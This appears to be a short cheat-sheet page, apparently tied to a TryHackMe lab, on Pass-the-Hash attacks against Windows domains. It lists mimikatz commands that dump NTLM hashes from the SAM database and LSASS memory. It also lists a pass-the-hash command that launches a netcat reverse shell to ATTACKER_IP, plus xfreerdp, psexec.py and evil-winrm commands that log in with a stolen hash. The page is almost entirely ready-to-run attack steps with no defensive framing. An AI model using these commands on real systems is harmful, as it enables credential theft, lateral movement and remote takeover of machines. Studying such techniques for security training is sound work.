Passing the Hash (PtH)

NTLM

Extracting NTLM Hashes

From the Local SAM Database

Commands:

mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::sam

From LSASS Memory

Commands:

mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # sekurlsa::msv

Using Extracted Hashes

Reverting Privileges Before Use
- Command:
  mimikatz # token::revert

Exploiting With PtH

Example Command:

mimikatz # sekurlsa::pth /user:bob.jenkins /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5555"

Passing the Hash Using Linux

Connect to RDP Using PtH

Command:

xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH

Connect via PsExec Using PtH
- Command:
  psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP
- Note: Only the Linux version of psexec supports PtH.

Connect to WinRM Using PtH

Command:

evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH

PreviousKerberos NextRemote process

Last updated 1 year ago

hashtagNTLM

hashtagPassing the Hash Using Linux

NTLM

Passing the Hash Using Linux